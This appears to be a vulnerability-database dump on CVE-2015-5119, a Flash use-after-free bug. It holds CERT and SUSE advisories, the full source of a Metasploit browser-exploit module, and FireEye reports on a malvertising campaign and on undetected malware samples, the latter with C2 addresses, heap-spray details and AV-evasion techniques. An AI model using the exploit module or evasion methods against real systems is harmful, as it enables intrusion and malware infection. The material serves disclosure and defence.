IDs:** | [CVE-2015-5119](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-5119>) \n---|--- \n**Date Public:** | 2015-07-05 \n**Date First Published:** | 2015-07-07 \n**Date Last Updated: ** | 2015-07-11 18:39 UTC \n**Document Revision: ** | 38 \n", "cvss3": {}, "published": "2015-07-07T00:00:00", "type": "cert", "title": "Adobe Flash ActionScript 3 ByteArray use-after-free vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119"], "modified": "2015-07-11T18:39:00", "id": "VU:561288", "href": "https://www.kb.cert.org/vuls/id/561288", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:13:40", "description": "flash-player was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5119: Unspecified vulnerability allowing remote attackers to\n take over the system (bsc#937339).\n\n", "cvss3": {}, "published": "2015-07-08T17:08:40", "type": "suse", "title": "Security update for flash-player (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-5119"], "modified": "2015-07-08T17:08:40", "id": "OPENSUSE-SU-2015:1207-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00015.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:02:17", "description": "flash-player was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5119: Unspecified vulnerability allowing 
remote attackers to\n take over the system (bsc#937339).\n\n", "cvss3": {}, "published": "2015-07-08T22:07:55", "type": "suse", "title": "Security update for flash-player (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-5119"], "modified": "2015-07-08T22:07:55", "id": "OPENSUSE-SU-2015:1210-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00016.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:05:46", "description": "flash-player was updated to fix 35 security issues.\n\n These security issues were fixed:\n - CVE-2015-3135, CVE-2015-4432, CVE-2015-5118: Heap buffer overflow\n vulnerabilities that could lead to code execution (bsc#937339).\n - CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431: Memory corruption vulnerabilities that\n could lead to code execution (bsc#937339).\n - CVE-2015-3126, CVE-2015-4429: Null pointer dereference issues\n (bsc#937339).\n - CVE-2015-3114: A security bypass vulnerability that could lead to\n information disclosure (bsc#937339).\n - CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122,\n CVE-2015-4433: Type confusion vulnerabilities that could lead to code\n execution (bsc#937339).\n - CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127,\n CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430,\n CVE-2015-5119: Use-after-free vulnerabilities that could lead to code\n execution (bsc#937339).\n - CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116: Vulnerabilities that could be exploited to bypass the\n same-origin-policy and lead to information disclosure (bsc#937339).\n\n", "cvss3": {}, "published": "2015-07-09T11:08:12", "type": "suse", "title": "Security update for flash-player (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": 
["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2015-07-09T11:08:12", "id": "SUSE-SU-2015:1211-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00017.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:28:41", "description": "flash-player was updated to fix 35 security issues.\n\n These security issues were fixed:\n - CVE-2015-3135, CVE-2015-4432, CVE-2015-5118: Heap buffer overflow\n vulnerabilities that could lead to code execution (bsc#937339).\n - CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431: Memory corruption vulnerabilities that\n could lead to code execution (bsc#937339).\n - CVE-2015-3126, CVE-2015-4429: Null pointer dereference issues\n (bsc#937339).\n - CVE-2015-3114: A security bypass vulnerability that could lead to\n information disclosure (bsc#937339).\n - CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122,\n CVE-2015-4433: Type confusion vulnerabilities that could lead to code\n execution (bsc#937339).\n - CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127,\n CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430,\n CVE-2015-5119: Use-after-free vulnerabilities that could lead to code\n execution (bsc#937339).\n - CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, 
CVE-2015-3125,\n CVE-2015-5116: Vulnerabilities that could be exploited to bypass the\n same-origin-policy and lead to information disclosure (bsc#937339).\n\n", "cvss3": {}, "published": "2015-07-09T14:08:22", "type": "suse", "title": "Security update for flash-player (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2015-07-09T14:08:22", "id": "SUSE-SU-2015:1214-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00018.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-05T03:19:42", "description": "This Metasploit module exploits a use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public on its July 2015 data leak, was described as a Use After Free while handling ByteArray objects. 
This Metasploit module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), IE11 and Flash 17.0.0.169, and Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.", "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "zdt", "title": "Adobe Flash Player ByteArray Use After Free Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-5119"], "modified": "2015-07-08T00:00:00", "id": "1337DAY-ID-23842", "href": "https://0day.today/exploit/description/23842", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player ByteArray Use After Free',\r\n 'Description' => %q{\r\n This module exploits an use after free on Adobe Flash Player. The vulnerability,\r\n discovered by Hacking Team and made public on its July 2015 data leak, was\r\n described as an Use After Free while handling ByteArray objects. 
This module has\r\n been tested successfully on:\r\n\r\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,\r\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,\r\n Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,\r\n Windows 8.1 (32-bit), IE11 and Flash 17.0.0.169, and\r\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Someone from HackingTeam\r\n 'juan vazquez', # msf module\r\n 'sinn3r' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2015-5119'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-03.html'],\r\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'],\r\n ['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => ['win', 'linux'],\r\n 'Arch' => [ARCH_X86],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :arch => ARCH_X86,\r\n :os_name => lambda do |os|\r\n os =~ OperatingSystems::Match::LINUX ||\r\n os =~ OperatingSystems::Match::WINDOWS_7 ||\r\n os =~ OperatingSystems::Match::WINDOWS_81 ||\r\n os =~ OperatingSystems::Match::WINDOWS_VISTA ||\r\n os =~ OperatingSystems::Match::WINDOWS_XP\r\n end,\r\n :ua_name => lambda do |ua|\r\n case target.name\r\n when 'Windows'\r\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\r\n when 'Linux'\r\n return true if ua == Msf::HttpClients::FF\r\n end\r\n\r\n false\r\n end,\r\n :flash => lambda do |ver|\r\n case target.name\r\n when 'Windows'\r\n # Note: Chrome might be vague about the version.\r\n # Instead of 18.0.0.203, it just says 18.0\r\n return true if Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')\r\n when 'Linux'\r\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= 
Gem::Version.new('11.2.202.468')\r\n end\r\n\r\n false\r\n end\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows',\r\n {\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Linux',\r\n {\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Jul 06 2015',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n b64_payload = Rex::Text.encode_base64(target_payload)\r\n os_name = target_info[:os_name]\r\n\r\n if target.name =~ /Windows/\r\n platform_id = 'win'\r\n elsif target.name =~ /Linux/\r\n platform_id = 'linux'\r\n end\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, 
binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5119', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\nend\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/23842", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fireeye": [{"lastseen": "2017-03-07T16:24:18", "description": "\n\nThreat Overview\n\nThe online advertisements that people see across a wide range of popular and lesser-known websites can lead to malware infections and other forms of compromise, sometimes without any user interaction whatsoever and without any indicators there is an issue.\n\nThis emerging threat is known as malvertising (a portmanteau of \u2018malicious\u2019 and \u2018advertising\u2019), and FireEye Labs recently uncovered an ongoing campaign involving online advertising network onclickads[.]net, a domain with an Alexa global rank of 39 and 113 in the United States. Onclickads[.]net is operated by Propeller Ads Media, an online advertising exchange.\n\nIn this case, websites serving ad content from onclickads[.]net could infect visitors by first redirecting them to the Rig Exploit Kit. An exploit kit is essentially a toolkit that automatically targets specified software vulnerabilities \u2013 primarily to distribute malware.\n\nThe FireEye Dynamic Threat Intelligence (DTI) first detected the malvertising activity on Oct. 6, 2015, and the campaign is still active today. 
Those redirected to the Rig Exploit Kit landing page could be compromised via exploits targeting Adobe Flash, Internet Explorer, Java and Microsoft Silverlight.\n\nFor the everyday Internet user, the threat would play out like this: The user navigates to a website; the website serves a malicious advertisement from onclickads[.]net; the user is redirected to the Rig Exploit Kit landing page and one of several vulnerabilities is targeted.\n\nFor this particular campaign, a completely successful attack results in the user becoming infected with malware.\n\nTechnical Details\n\nDTI detected Rig Exploit Kit URLs on a daily basis and each URL had a similar HTTP Referer header field belonging to onclickads[.]net, as shown in Figure 1.\n\n\n\nFigure 1. Example onclickads[.]net referers seen redirecting to Rig Exploit Kit\n\nMalvertising attacks can be difficult to identify, but in this case, as shown in Figure 2, it starts with a normal looking ad content HTTP GET request made when visiting a site that serves ad content from onclickads[.]net.\n\n\n\nFigure 2. GET request to onclickads[.]net\n\nLooking a little closer, we see that the URL contains strings that slightly resemble those used by OpenX/Revive ad servers, one of the most popular ad software systems on the market.\n\nCommonly seen, legitimate OpenX/Revive URLs might look something like this:\n\n/www/delivery/afr.php?zoneid=8&cb=1925363925374\n\nWe checked out a copy of the OpenX repository to review the contents. While the repository contains a legitimate file named afr.php, there was no file named afu.php as shown in the GET request from Figure 2.\n\nAlthough ad servers are often abused by malvertisers, OpenX systems and their associated URLs are normally not an indication of malicious activity, just advertising activity; so it\u2019s common to see them mixed in with other HTTP traffic in most network environments. 
You can see how the malicious traffic associated with this malvertising campaign might slip by with other OpenX advertising traffic since it closely resembles that of a legitimate ad system.\n\nOnclickads[.]net appears to have previously been involved in malvertising activity. The online advertising network was recently used in a similar campaign involving the Angler Exploit Kit, and \u2013 as seen in Figure 3 \u2013 we have still observed redirections to fake Flash media players.\n\n\n\nFigure 3. Some referer URLs redirected to fake media players when visited\n\nAs mentioned before, those who are redirected to the Rig Exploit Kit landing page could be compromised via exploits targeting Adobe Flash, Internet Explorer, Java and Microsoft Silverlight.\n\nExamples of Rig Exploit Kit landing page URLs we logged can be seen in Figure 4. These all had an onclickads[.]net URL (similar to Figure 1) in the referer field.\n\n\n\nFigure 4. Rig Exploit Kit URLs\n\nAs shown in Figure 5, the Rig Exploit Kit obfuscates its landing pages to make analysis and detection tougher. The landing page contains code that checks for the presence of antivirus or virtual environments \u2013 if either is detected by the exploit kit, the exploit will not be served.\n\n\n\nFigure 5. Obfuscated Rig Exploit Kit landing page\n\nThe samples we analyzed used an exploit for CVE-2015-5119, the Adobe Flash use-after-free vulnerability revealed in the Hacking Team leak. As mentioned [here](<http://malware.dontneedcoffee.com/2015/07/hackingteam-flash-0d-cve-2015-xxxx-and.html>), CVE-2015-5119 was integrated into Rig Exploit Kit in July. After the landing page loads, the Flash exploit is downloaded, as seen in Figure 6.\n\n\n\nFigure 6. Flash exploit being downloaded\n\nAfter successful exploitation, the payload downloads malware to the system.\n\nAs of Nov. 13, 2015, the exploit kit is redirecting to Magnitude EK URLs. 
Some example Magnitude EK URLs look like this: \n \n6d3bd.439.74331q.436161bv.0ecu.u677n.2401q.p44m.l0sm6dacs2.eventsam.pw/?2d5f484b42434e41444e464c495e03434859 \nmebf65l.c06a2r.ldfbk.zd899fu.w54358p.hf47613b.u90.y99xvzga7k95.satshares.pw/?225047444d4c414e4b41494346510c4c4756 \nl9077e2v.he02528l.obdb52x.34aa9.z144.8d3d49.j0i.w687g98o.hairunits.pw/?2b594e4d444548474248404a4f5805454e5f \n \n\n", "edition": 2, "cvss3": {}, "published": "2015-11-13T13:32:25", "type": "fireeye", "title": "Top-ranked Advertising Network Leads to Exploit Kit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119"], "modified": "2015-11-13T13:32:25", "id": "FIREEYE:C1FB4B9FAC84D1B9FD74A7D5A588D1D2", "href": "https://www.fireeye.com/blog/threat-research/2015/11/top-ranked_advertisi.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:25:47", "description": "We would like to introduce the first of our \u201cGhosts in the Endpoint\u201d series, a report prepared by FireEye Labs that documents malicious software not being detected in the wild by traditional signature-based detections.\n\nIn this study, all the families identified are samples from VirusTotal (VT) with zero detections, but detected as malicious by our Multi-Vector Virtual Execution (MVX) Engine. 
We also added a few samples with very low detection rates (VT <=3) but with interesting bypass techniques.\n\nOur goal is to share indicators that help the AV community and others improve their detection coverage.\n\n##### **Scope**\n\n * So far, only samples found in VT with the following file types were included in this study:\n * Win32 binaries\n * Office documents (including Open XML format)\n * RTF documents\n * Hangul Word Processor (HWP)[1] documents\n\nThe study includes samples submitted to VT in 2015 that were still found undetected or with minimal detection rates as of January 2016 (see VT detection Tables in the Appendix). \n\n##### **Findings**\n\nThe following samples were identified in our research:\n\n**Suspected APT malware:**\n\n 1. **GOODTIMES backdoor**: Suspected APT; MS Office with Embedded Hacking Team Flash Exploit\n 2. **UPS backdoor: **Suspected APT3\n 3. **VBA Macro + Metasploit Shellcode Loader:** Suspected Middle Eastern-based APT\n 4. **Hancom Office HWP Exploit:** Possible APT targeting of South Korea.\n\n**Malware without attribution:**\n\n 1. **OccultAgent**: (New) Code hidden in Excel spreadsheet\n 2. **Spy-Net RAT**: Targeting Brazilian victims\n 3. **VBA Macros + PowerShell scripts:** Netcat Backdoor\n 4. **VBA Macros + Python scripts:** Metasploit Shellcode Loader\n 5. **Office Downloader**\n\n##### **Detailed Sample Analysis**\n\nMalware that remains undetected by more than 56 different AV vendors over a long period of time is worth investigating. This section briefly describes the malware and techniques identified in the undetected samples. A full list of indicators can be found in the IOC section at the end.\n\n**1\\. 
4b3858c8b35e964a5eb0e291ff69ced6** \\- 201507.xlsx\n\nType: XLSX \nDescription: CVE-2015-5119 (Flash exploit exposed in the Hacking Team leak) \nAttribution: Suspected APT threat group targeting Taiwan \nCurrent detection: 0/53 \nFirst Submission: July 13, 2015 \nLast Submission: January 27, 2016 \nTime undetected in VT: At least 6 months \n\n\nThis Excel document is PKZIP compressed (following the Open XML Format) with the structure shown in Figure 1:\n\n\n\nFigure 1: Structure of XLSX document\n\nWhen the spreadsheet is opened, a dialog prompts the victim to allow unknown embedded content to be played, as shown in Figure 2. In this case, social engineering is needed to convince the victim to execute the malicious Flash object.\n\n\n\nFigure 2: Excel document content and prompt\n\nWhen the victim allows the embedded content to be played, the activeX1.xml file is read to locate the OLE Control to be used (which corresponds to Macromedia Flash Player, as shown in Figure 3) through the ClassID attribute to finally load the Flash Exploit embedded in the activeX1.bin object.\n\n\n\nFigure 3: Content of activeX1.xml file\n\nThe embedded Flash exploit corresponds to CVE-2015-5119, one of several zero-day exploits identified following the Hacking Team leak in July 2015.[2]\n\nA look at the Flash Action Script (AS) reveals code similar to that from the Hacking Team Exploit, such as the class name exp1_fla/MainTimeLine, the function name TryExpl() with the same use-after-free technique, and even the same error message \u201ccan\u2019t cause UaF\u201d as shown in Figure 4.\n\n\n\nFigure 4: Flash exploit code\n\nThe combination of the class name exp1_fla() and classes ShellMac64, ShellWin32 and ShellWin64 built into the exploit (see Figure 5) were not observed in the original Hacking Team version of the exploit, suggesting that the group responsible for this malicious Excel file modified the original exploit code.\n\n\n\nFigure 5: Flash Action Script classes from malicious 
Excel file\n\nThe exploit drops a variant of the backdoor we call GOODTIMES (also known as Linopid). The backdoor communicates to Taiwan-based IP addresses 220.128.223.75 and 220.134.47.67 on ports 8080 and 443 via HTTP.\n\nWhile this particular GOODTIMES sample has not been attributed to a specific threat group, GOODTIMES has previously been used by suspected APT actors. Based on previously identified targets and the use of Traditional Chinese language and Taiwan-centric themes in spear phishing messages and decoy documents, the group appears to focus on Taiwanese targets.\n\n##### **Potential AV bypassing reason**\n\n1\\. New delivery mechanism: The leaked CVE-2015-5119 Flash exploit has been used by a wide range of threat groups, including other APT groups such as APT3 and APT18[3]. Previous delivery methods entailed luring the victim to click on a malicious link (delivered via a spear phishing message) where the malicious Flash exploit was hosted on a web page. In this case, the suspected APT group responsible for the GOODTIMES backdoor changed the **delivery mechanism** by embedding the exploit as ActiveX object inside the Excel Open XML Format (PKZIP compressed).\n\n2\\. In addition, while an ActiveX object would normally be embedded inside a Compound File Binary Format[4], in this case the uncompressed Flash content is embedded directly in the Excel file, right after the ClassID, as shown at Figure 6.\n\n\n\nFigure 6: Embedded Flash object\n\n\u00b7 The above steps might be enough to avoid proper parsing of the malicious Flash object. This is the first time we have seen a CVE-2015-5119 sample embedded in an Excel document this way.\n\n**2\\. 
22da029dd4e018b7c7135a03d0ba9b99**\n\nType: Win32 binary \nDescription: A variant of the UPS backdoor \nAttribution: suspected APT3 \nCurrent detection: 0/57 \nFirst Submission: August 6, 2015 \nLast Submission: February 2, 2016 \nTime undetected in VT: At least 6 months\n\nUPS is a backdoor capable of uploading and downloading files, creating a reverse shell, reconfiguring itself to use different command and control (CnC) servers, and acting as a proxy server. It uses a custom binary protocol to communicate with its CnC server and it encrypts this custom protocol using a TLS TCP connection.\n\nWhile this particular UPS sample has not been attributed, UPS is commonly used by the China-based APT3.\n\n**Potential AV bypassing reason**\n\n1\\. Junk code insertion: Examining this UPS sample, we see a significant amount of \u201cjunk code\u201d potentially designed to mask the malicious nature of the binary, as well as to complicate analysis or reverse engineering efforts.\n\nIn Figure 7 we see the backdoor executing a jump to address 0x4043AB by forcing the \u201cjump if greater than\u201d comparison to be true by moving a large value (0x4A2E88E4) to the ebx register and then comparing it with a hardcoded lower value (0x6A1E839), after which a large number of junk instructions are skipped (red square). This strategy can be seen through several different execution paths.\n\n\n\nFigure 7: Decompiled UPS sample showing junk code\n\n**3\\. 
aedd5d8446cc12ddfdc426cca3ed8bf0 - **S-old.xlsb****\n\nType: XLSB \nDescription: VBA Macro + Metasploit Shellcode Loader Backdoor \nAttribution: Suspected Middle Eastern-based APT \nCurrent detection: 1/52 \nFirst Submission: September 28, 2015 \nLast Submission: January 28, 2016 \nTime undetected in VT: At least 4 months\n\nThis particular sample, an Excel Binary Workbook file,[5] has only one generic detection on VT, so we believe it is still worth mentioning in this report.\n\nWhen the spreadsheet is opened, the victim is shown a table of Israeli holidays and prompted to enable macros to view the full list, as shown in Figure 8:\n\n\n\nFigure 8: Malicious Excel file showing calendar data\n\nWhen the macro is executed it creates a Windows binary in memory as shown in Figure 9. Note the Chr(77) + Chr(90) builds the MS-DOS header magic number \u201cMZ\u201d.\n\n\n\nFigure 9: Macro concatenating bytes to form a Windows binary\n\nThe binary is written to the file system with the file name NTUSER.dat{**GUID**}.exe as shown in Figure 10.\n\n\n\nFigure 10: Creating the Windows binary\n\nIn this case, the GUID selected corresponds to Scriptlet.TypeLib ActiveX object, creating the file name NTUSER.dat{FB9D87AE-8FEA-4583-98AB-2FB396EAB5FC}.exe (md5 6aab47b18afacbfa7423f09bd1fa6d25) that is later executed via the ShellExecute() API with the SW_HIDE parameter to run silently.\n\nFinally, the executable comes with an embedded Metasploit Shellcode loader that connects to 84.11.146.62 on port TCP 13661.\n\nWhile this sample has not been attributed, similar techniques (use of XLSB files with embedded, obfuscated macros; creation of the file name NTUSER.dat{GUID}.exe; use of the binary to download additional malware) and the same CnC IP address have been referenced in reporting on a suspected Middle Eastern-based APT group known as \u201cRocket Kitten\u201d, primarily targeting Middle Eastern and European organizations.\n\n**_Potential AV bypassing reason_**\n\n1\\. 
The byte concatenation inside the VBA Macro, used to build a Win32 binary at runtime, helps to bypass signature-based detection.\n\n**4\\. 4e51143b01e99afc3bd908794d81d3cb** \nType: HWP \nDescription: Hancom Office HWP Exploit \nAttribution: None \nCurrent detection: 3/53 \nFirst Submission: July 31, 2015 \nLast Submission: February 2, 2016 \nTime undetected in VT: At least 6 months with 3 generic detections\n\nThis sample, a Hangul Word Processor (HWP) document, has only three generic detections on VT, so we found it to be worth analyzing for this report.\n\nWhen opened, the HWP document displays Korean text and some photographs, as shown in Figure 11. Behind the scenes the document will exploit vulnerable versions of Hancom Office, dropping and executing a malicious file.\n\n\n\nFigure 11: Content of malicious HWP document\n\nInternally, the document structure includes three sections, where section 0 will trigger a Type Confusion vulnerability while parsing the content of the paragraph located at the data record structure HWPTAG_PARA_TEXT starting at offset 0x1C (see uncompressed section 0 at Figure 12). The logic bug will cause the string starting at offset 0x50 to be treated as a control structure. This control structure contains a fake object at offset 0x56 pointing to an address (0x0e0a0e0a) filled by a heap spray that eventually will redirect the execution flow to the shellcode.\n\n\n\nFigure 12: Section0 malformed paragraph\n\nA similar type confusion vulnerability has been previously documented by Ahnlab,[6] however, the vulnerability trigger is different.\n\nSection 2 has an uncompressed size equal to 112MB, used to perform the heap spray and expecting to place the shellcode at a memory address close to 0x0e040e04. In Figure 13, the beginning of the shellcode can be seen (uncompressed).\n\n\n\nFigure 13: Start of shellcode\n\nThe shellcode drops a file on disk and executes it via HncBLXX.HncShellExecute-> SHELL32.ShellExecute. 
This generates a connection to a compromised Korean automotive website and attempts to retrieve a file with a .JPG extension, which we suspect may be a second-stage binary. However, the file was no longer available on the website at the time of our analysis.\n\nThis particular sample has not been attributed to any threat group. However, the use of malicious HWP documents is notable, as that format is specific to a regional word processing program used heavily in South Korea and in particular by the South Korean government. While the use of malicious HWP files could simply indicate regional targeting by unspecified threat actors, similar exploits have been used in the past by suspected APT groups.\n\n**Potential AV bypassing reason**\n\n1\\. Heap Spray technique change: Similar exploits used to be created with multiple large-size sections in order to spray the heap. This exploit fulfills the same purpose but with only one large-size section.\n\n2\\. Vulnerability triggered in a different format: A similar type confusion vulnerability described in this section was seen implemented in the Open XML Format (HWPX extension)[7], but this time ported to the Compound File Binary Format (HWP extension).\n\n**5\\. 497eddab53c07f4be1dc4a8c169261a5** \\- Barclays_Q22015_IMS_excel_tables.xlsm\n\nType: XLSM \nDescription: **VBA Macro + VBScript generated from spreadsheet** \nAttribution: None \nCurrent detection: 1/54 \nFirst Submission: July 08, 2015 \nLast Submission: January 27, 2016 \nTime undetected in VT: At least 7 months\n\nThis sample, an Excel macro-enabled file, has only one generic detection. The embedded macro creates an encoded Visual Basic (VBE) file that connects to a CnC site and allows remote control of the victim\u2019s computer. As we had not previously observed this backdoor, we named it OccultAgent.\n\nWhen the XLSM file is opened, the user is prompted to enable macros, as shown in Figure 14. 
